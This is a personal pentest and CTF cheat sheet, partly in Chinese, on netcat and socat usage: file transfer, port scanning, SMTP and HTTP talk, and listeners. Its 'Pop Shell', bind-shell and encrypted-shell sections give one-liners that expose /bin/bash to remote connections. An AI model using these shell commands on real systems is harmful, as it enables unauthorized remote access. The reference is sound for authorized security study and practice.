Maojui

攻擊伺服器 | 快速與服務溝通

2022-08-06

檔案傳輸 (Transferring files)

  • http server

    1
    2
    python -m SimpleHTTPServer 8080
    python3 -m http.server 8080
  • ftp server

    1
    2
    python -m pyftpdlib -p 2121 -w
    python3 -m pyftpdlib -p 2121 -w

NC (netcat)

  • Connection to server

    • TCP Server

      1
      2
      3
      4
      5
      # nc <domain_name> <PORT>
      nc host.example.com 80

      # nc [-param] <IP> <PORT>
      nc -nv 127.0.0.1 80
      • -n : Skip DNS name resolution
      • -v : Add some verbosity
      1
      nc -p 31337 -w 5 host.example.com 80
      • -p : Specifiy source port 31337
      • -w : Wait for 5 second
    • UDP Server

      1
      nc -u host.example.com 53
  • As A Server

    • TCP Server

      1
      nc -nlvp 4443
      • -l : Create a listener
      • -p : Specify the listening port number
  • Pop Shell

    1
    2
    3
    4
    5
    6
    # Linux
    nc -nlvp 4444 -e /bin/bash

    # Mac (& connect twice)
    nc -lp 4444 | /bin/bash | nc -lp 4444
    netcat -nlvp 4444 -e /bin/bash
  • Talk to HTTP Server

    1
    printf "GET / HTTP/1.0\r\n\r\n" | nc host.example.com 80
  • Talk to SMTP Server

    1
    2
    3
    4
    5
    6
    7
    8
    9
    nc [-C] localhost 25 << EOF
    HELO host.example.com
    MAIL FROM:<[email protected]>
    RCPT TO:<[email protected]>
    DATA
    Body of e-mail.
    .
    QUIT
    EOF
  • Port Scanning

    1
    2
    3
    4
    5
    # Continous
    nc -zv host.example.com 20-30

    #Specifiy
    nc -zv host.example.com 80 20 22
    • Test each server who is running

      1
      echo "QUIT" | nc host.example.com 20-30
  • Creates and listens on a UNIX-domain stream socket.

    1
    2
    3
    4
    nc -lU /var/tmp/dsocket

    # Connects to port 42 of host.example.com via an HTTP proxy at 10.2.3.4, port 8080.
    nc -x10.2.3.4:8080 -Xconnect host.example.com 42

SOCAT

  • 直接連線

    1
    2
    # socat TCP4:<domain/IP>:<PORT> [Output]
    socat TCP4:server.maojui.me:4444 STDOUT
    • 接收內容寫並入檔案

      1
      2
      # socat TCP4:<domain/IP>:<PORT> file:<write_response_to>,create
      socat TCP4:server.maojui.me:4444 file:received_secret_passwords.txt,create
    • Socat Encrypted Bind Shells

      1
      socat - OPENSSL:10.11.0.4:443,verify=0
  • As A Server

    1
    2
    3
    4
    # tcp-listen:<PORT>,<param>,... : 等待連線 

    socat TCP4-LISTEN:443 STDOUT
    socat -d -d TCP4-LISTEN:443 STDOUT
    • -d : For more connection detail.

    • -d -d : Showing fatal, error, warning, and notice messages.

    • Share the file

      1
      socat TCP4-LISTEN:443,fork,reuseaddr file:secret_passwords.txt
    • Pop Shell

      1
      2
      # 把 bash 噴給在 127.0.0.1:443 Listen 的 Service
      socat TCP4:127.0.0.1:443 EXEC:/bin/bash
    • Bind Shell

      1
      2
      3
      4
      5
      # 把 Bash Shell 噴給任何從 443 PORT 連進來的人
      socat -d -d TCP4-LISTEN:443 EXEC:/bin/bash

      # 把 Bash Shell 噴給任何從 443 PORT 連進來但有憑證的人
      socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=1,fork EXEC:/bin/bash
    • Execute when TCP connect

      1
      2
      # socat -v tcp-listen:10000,fork,reuseaddr,su=ctf EXEC:"$COMMAND"$EXTRA
      socat tcp-listen:4123,fork,reuseaddr,su=ctf EXEC:"python exp.py"
      • su : user permission
    • Encrypted Shell

      1
      2
      # cert=<cert.pem>
      socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
      • cert : 憑證
      • verify : 是否啟用 SSL 連線, 0=disable, 1=enable